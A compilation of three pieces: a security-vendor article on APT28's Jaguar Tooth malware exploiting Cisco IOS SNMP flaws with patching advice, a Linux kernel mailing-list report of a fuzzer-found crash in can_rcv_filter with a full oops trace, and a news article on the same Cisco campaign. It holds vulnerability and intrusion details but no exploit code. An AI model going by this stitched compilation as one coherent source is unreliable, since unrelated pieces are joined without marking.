This was possible because the SNMP subsystem of Cisco IOS and IOS XE Software contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. These vulnerabilities affect all releases of Cisco IOS and IOS XE Software prior to the first fixed release and they affect all versions of SNMP-Versions 1, 2c, and 3. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6.

Enter Jaguar Tooth, the name of the malware that APT28 used to obtain further device information and enabled unauthenticated access via a backdoor. The actor obtained this device information by executing a number of commands via the malware and send them out over trivial file transfer protocol (TFTP). The information includes discovery of other devices on the network.

**Discovery and countermeasures**

Should you be worried about this threat? That depends on your threat model. If there is a reason for state actors to be interested in you in some way, then the answer is yes. This is the type of threat that the UK’s Minister and Secretary of State for National Investment Security, Mr Dowden, is referring to when he talks about groups that are ideologically motivated, rather than financially motivated.

If you suspect your router has been compromised, you can follow Cisco’s advice for verifying the Cisco IOS image. If that does not take away your suspicion, you should:

*   Revoke all keys associated with that router. When replacing the router configuration be sure to create new keys rather than pasting from the old configuration.
*   Replace both the ROMMON and Cisco IOS image with an image that has been sourced directly from the Cisco website, in case third party and internal repositories have been compromised.

To prevent falling victim to this specific threat there are some steps you should take:

*   Patch devices as advised by Cisco
*   Do not use SNMP if you are not required to configure or manage devices remotely. If you do need it, use a limiting allow list for SNMP messages to prevent unauthorized users from accessing your router.
*   Review your password policy and adapt it where necessary.
*   Use logging tools to record commands executed on your network devices.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Fancy Bear known to be exploiting vulnerability in Cisco routers

A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service.

From: Wei Chen <harperchen1110@gmail.com>
To: socketcan@hartkopp.net, mkl@pengutronix.de,
	"David S. Miller" <davem@davemloft.net>,
	Eric Dumazet <edumazet@google.com>,
	Jakub Kicinski <kuba@kernel.org>,
	netdev@vger.kernel.org, linux-can@vger.kernel.org,
	linux-kernel@vger.kernel.org, Paolo Abeni <pabeni@redhat.com>,
	syzkaller-bugs@googlegroups.com,
	syzbot <syzkaller@googlegroups.com>
Subject: BUG: unable to handle kernel paging request in can\_rcv\_filter
Date: Tue, 6 Dec 2022 23:25:36 +0800	\[thread overview\]
Message-ID: <CAO4mrfcV\_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w@mail.gmail.com> (raw)

Dear Linux Developers,

Recently, when using our tool to fuzz kernel, the following crash was triggered.

HEAD commit: 147307c69ba
git tree: linux-next
compiler: clang 12.0.0
console output:
https://drive.google.com/file/d/1\_c7TZ6WzCT-VLBimUP3xnkMpJPhjOAPY/view?usp=share\_link
kernel config: https://drive.google.com/file/d/1NAf4S43d9VOKD52xbrqw-PUP1Mbj8z-S/view?usp=share\_link

Unfortunately, I didn't have a reproducer for this crash.

I'm wondering if there is a data race between can\_receive and
sock\_close, which leads to the invalid null value of dev and
dev\_rcv\_lists. I hope the following report is helpful.

IMPORTANT: if you fix the bug, please add the following tag to the commit:
Reported-by: Wei Chen <harperchen1110@gmail.com>

BUG: unable to handle page fault for address: 0000000000006020
#PF: supervisor read access in kernel mode
#PF: error\_code(0x0000) - not-present page
PGD 132110067 P4D 132110067 PUD 1320b6067 PMD 0
Oops: 0000 \[#1\] PREEMPT SMP
CPU: 0 PID: 13844 Comm: syz-executor.0 Not tainted 6.1.0-rc5-next-20221118 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.13.0-48-gd9c812dda519-prebuilt.qemu.org 04/01/2014
RIP: 0010:can\_rcv\_filter+0x44/0x4e0 net/can/af\_can.c:584
Code: 00 00 00 e8 3e 86 0f fd 49 8b 9e d8 00 00 00 48 89 df e8 af 81
0f fd 44 8b 23 48 8d bd 20 60 00 00 e8 a0 81 0f fd 48 89 2c 24 <8b> 9d
20 60 00 00 45 31 ed 31 ff 89 de e8 9a 1c fc fc 85 db 0f 84
RSP: 0018:ffffc90000003d50 EFLAGS: 00010246
RAX: ffff88813bc274d8 RBX: ffff8881310c5a10 RCX: ffffffff842b9940
RDX: 0000000000000522 RSI: 0000000000000000 RDI: 0000000000006020
RBP: 0000000000000000 R08: 0000000000006023 R09: 0000000000000000
R10: 0001ffffffffffff R11: 00018881310c5a04 R12: 0000000000000000
R13: ffff888106fb8880 R14: ffff8881308cba00 R15: 0000000000000000
FS:  00007fc9368b0700(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000006020 CR3: 0000000132249000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000020000180 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000600
Call Trace:
 <IRQ>
 can\_receive+0x182/0x1f0 net/can/af\_can.c:664
 canfd\_rcv+0x9a/0x120 net/can/af\_can.c:703
 \_\_netif\_receive\_skb\_one\_core net/core/dev.c:5482 \[inline\]
 \_\_netif\_receive\_skb+0x8b/0x1b0 net/core/dev.c:5596
 process\_backlog+0x23f/0x3b0 net/core/dev.c:5924
 \_\_napi\_poll+0x65/0x420 net/core/dev.c:6485
 napi\_poll net/core/dev.c:6552 \[inline\]
 net\_rx\_action+0x37e/0x730 net/core/dev.c:6663
 \_\_do\_softirq+0xf2/0x2c9 kernel/softirq.c:571
 do\_softirq+0xb1/0xf0 kernel/softirq.c:472
 </IRQ>
 <TASK>
 \_\_local\_bh\_enable\_ip+0x6f/0x80 kernel/softirq.c:396
 local\_bh\_enable+0x1b/0x20 include/linux/bottom\_half.h:33
 netif\_rx+0x63/0x1c0 net/core/dev.c:5003
 can\_send+0x521/0x5b0 net/can/af\_can.c:286
 bcm\_can\_tx+0x2f0/0x3f0 net/can/bcm.c:302
 bcm\_tx\_setup net/can/bcm.c:1020 \[inline\]
 bcm\_sendmsg+0x1f78/0x2c50 net/can/bcm.c:1351
 sock\_sendmsg\_nosec net/socket.c:714 \[inline\]
 sock\_sendmsg net/socket.c:734 \[inline\]
 \_\_\_\_sys\_sendmsg+0x38f/0x500 net/socket.c:2476
 \_\_\_sys\_sendmsg net/socket.c:2530 \[inline\]
 \_\_sys\_sendmsg+0x197/0x230 net/socket.c:2559
 \_\_do\_sys\_sendmsg net/socket.c:2568 \[inline\]
 \_\_se\_sys\_sendmsg net/socket.c:2566 \[inline\]
 \_\_x64\_sys\_sendmsg+0x42/0x50 net/socket.c:2566
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
 do\_syscall\_64+0x2b/0x70 arch/x86/entry/common.c:80
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x4697f9
Code: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d
01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fc9368afc48 EFLAGS: 00000246 ORIG\_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 000000000077bf80 RCX: 00000000004697f9
RDX: 0000000000000000 RSI: 0000000020000380 RDI: 0000000000000006
RBP: 00000000004d29e9 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000077bf80
R13: 0000000000000000 R14: 000000000077bf80 R15: 00007ffe26483e60
 </TASK>
Modules linked in:
CR2: 0000000000006020
---\[ end trace 0000000000000000 \]---
RIP: 0010:can\_rcv\_filter+0x44/0x4e0 net/can/af\_can.c:584
Code: 00 00 00 e8 3e 86 0f fd 49 8b 9e d8 00 00 00 48 89 df e8 af 81
0f fd 44 8b 23 48 8d bd 20 60 00 00 e8 a0 81 0f fd 48 89 2c 24 <8b> 9d
20 60 00 00 45 31 ed 31 ff 89 de e8 9a 1c fc fc 85 db 0f 84
RSP: 0018:ffffc90000003d50 EFLAGS: 00010246
RAX: ffff88813bc274d8 RBX: ffff8881310c5a10 RCX: ffffffff842b9940
RDX: 0000000000000522 RSI: 0000000000000000 RDI: 0000000000006020
RBP: 0000000000000000 R08: 0000000000006023 R09: 0000000000000000
R10: 0001ffffffffffff R11: 00018881310c5a04 R12: 0000000000000000
R13: ffff888106fb8880 R14: ffff8881308cba00 R15: 0000000000000000
FS:  00007fc9368b0700(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000006020 CR3: 0000000132249000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000020000180 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000600
----------------
Code disassembly (best guess):
   0: 00 00                add    %al,(%rax)
   2: 00 e8                add    %ch,%al
   4: 3e 86 0f              xchg   %cl,%ds:(%rdi)
   7: fd                    std
   8: 49 8b 9e d8 00 00 00 mov    0xd8(%r14),%rbx
   f: 48 89 df              mov    %rbx,%rdi
  12: e8 af 81 0f fd        callq  0xfd0f81c6
  17: 44 8b 23              mov    (%rbx),%r12d
  1a: 48 8d bd 20 60 00 00 lea    0x6020(%rbp),%rdi
  21: e8 a0 81 0f fd        callq  0xfd0f81c6
  26: 48 89 2c 24          mov    %rbp,(%rsp)
\* 2a: 8b 9d 20 60 00 00    mov    0x6020(%rbp),%ebx <-- trapping instruction
  30: 45 31 ed              xor    %r13d,%r13d
  33: 31 ff                xor    %edi,%edi
  35: 89 de                mov    %ebx,%esi
  37: e8 9a 1c fc fc        callq  0xfcfc1cd6
  3c: 85 db                test   %ebx,%ebx
  3e: 0f                    .byte 0xf
  3f: 84                    .byte 0x84

Best,
Wei

next             reply	other threads:\[~2022-12-06 15:26 UTC|newest\]

**Thread overview:** 2+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
**2022-12-06 15:25 Wei Chen \[this message\]**
2022-12-06 16:35 \` BUG: unable to handle kernel paging request in can\_rcv\_filter Eric Dumazet

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=CAO4mrfcV\_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w@mail.gmail.com \\
    --to=harperchen1110@gmail.com \\
    --cc=davem@davemloft.net \\
    --cc=edumazet@google.com \\
    --cc=kuba@kernel.org \\
    --cc=linux-can@vger.kernel.org \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=mkl@pengutronix.de \\
    --cc=netdev@vger.kernel.org \\
    --cc=pabeni@redhat.com \\
    --cc=socketcan@hartkopp.net \\
    --cc=syzkaller-bugs@googlegroups.com \\
    --cc=syzkaller@googlegroups.com \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2023-2166: BUG: unable to handle kernel paging request in can_rcv_filter

The nation-stage threat group deployed custom malware on archaic versions of Cisco's router operating system. Experts warn that such attacks targeting network infrastructure are on the rise.

As recently as 2021, the notorious Russian APT28 was exploiting network routers running outdated versions of Cisco's IOS and IOS XE operating system software, using them to deploy backdoors in networks across European and American government institutions.

APT28 — aka Fancy Bear, Strontium, Tsar Team, and Sofacy Group — is best known for its campaigns against Ukraine and the 2016 US elections. The UK National Cyber Security Centre (NCSC) has attributed this group to the 85th Special Service Centre, Military Intelligence Unit 26165, part of Russia's General Staff Main Intelligence Directorate (GRU).

NCSC, National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and FBI this week published a joint advisory outlining one of APT28's less technically impressive but more economic maneuvers. According to their findings, the group used unpatched Cisco routers to access "a small number" of EU and US government institutions, on top of "approximately 250 Ukrainian victims."

Though the campaign took place two years ago, Cisco Talos in a blog post expressed how "deeply concerned" it is "by an increase in the rate of high-sophistication attacks on network infrastructure" by nation-state actors.

"We certainly have seen an increase over the last several years — even over the last six to 12 months — in targeting this type of infrastructure," says JJ Cummings, national security principal at Cisco Talos. "I think this is probably only the tip of the iceberg."

**Taking Advantage of Vulnerable Routers**

On June 29, 2017, Cisco revealed a series of vulnerabilities in the Simple Network Management Protocol (SNMP), a communications protocol for network devices running IOS versions 12.0 through 12.4 and 15.0 through 15.6, and IOS XE 2.2 through 3.17.

A specially crafted SNMP packet, the company explained, could have allowed attackers to remotely execute code on affected devices, or cause them to reboot. The vulnerabilities were grouped under CVE-2017-6742 and assigned a "High" CVSS score of 8.8.

Though a patch for the SNMP vulnerabilities was released all those years ago, by 2021 APT28 was still exploiting Cisco routers to access US, EU, and primarily Ukrainian government networks.

In the same way administrators use SNMP to remotely monitor and configure network devices, APT28 used it to remotely access devices and penetrate networks.

"A number of software tools can scan the entire network using SNMP," the advisory explained, "meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks."

In particular, APT28 took advantage of weak passwords — "community strings," in Cisco parlance — such as the default public string in order to crack routers and, in some cases, deploy their "Jaguar Tooth" malware. Jaguar Tooth was specifically designed to exploit CVE-2017-6742, stealing device information and planting a backdoor for persistent access.

**Thousands of Routers Are Exposed Online**

A remarkable number of enterprise Internet routers in operation today are publicly exposed on the open Internet. And they're not only exposed — they're vulnerable. For scale, consider this:

After a series of vulnerabilities were discovered in multiple Cisco Small Business Routers earlier this year, software company Censys scanned for any potentially vulnerable devices online. The search returned over 20,000 results, the vast majority of which are still equally exposed to this day.

And just as a software company can identify these devices, so can hackers." Usually, cybercriminals will be using tools like Shodan or Nmap to scan and look for exposed devices connected to the internet," explains James McQuiggan, security awareness advocate at KnowBe4. "Organizations may try the 'security by obscurity' model, hoping they're not discovered running older legacy systems," he says, but hackers who can find and so easily exploit these devices "have opened the electronic front door."

Cisco regularly publishes information about new vulnerabilities and risks to IT infrastructure, such as this blog post published on April 18

**Why Routers Go Unpatched**

In IT environments, Cummings observes, there's one main reason why routing devices remain unpatched for years at a time. "Think about what the primary mission of a network operations team is: to keep the network up and running, right?" A byproduct of this prioritization of reliability and availability, he says, could be that "if a device is not broken, maybe they're not going to fix it."

Further, updating can sometimes come at a cost — albeit temporary — for operations. "We've seen in a couple of cases that, while the process to upgrade isn't necessarily difficult or arduous, it's also not always without risk for network availability." If availability is the primary goal, "if they're incentivized not to impact that, anything that gets in the way is something that they're going to shy away from."

Updating IOS and IOS XE is necessary for addressing CVE-2017-6742, but in cases where doing so is tricky, there are other simple changes IT administrators can make to harden against similar infrastructure breaches. "If updates are not possible," McQuiggan says, "network monitoring — even if it's by a third-party managed security service — can alert of intrusions and possible unauthorized logins to external-facing networking equipment."

In its blog post, Cisco emphasized more than anything the need to restrict infrastructure to trusted users. "Designed to prevent unauthorized direct communication to network devices, infrastructure access control lists (ACLs) are one of the most critical security controls that can be implemented in networks," they wrote. "Exploitation of these vulnerabilities is best prevented by restricting access to trusted administrators and IP addresses."

Tag

#ios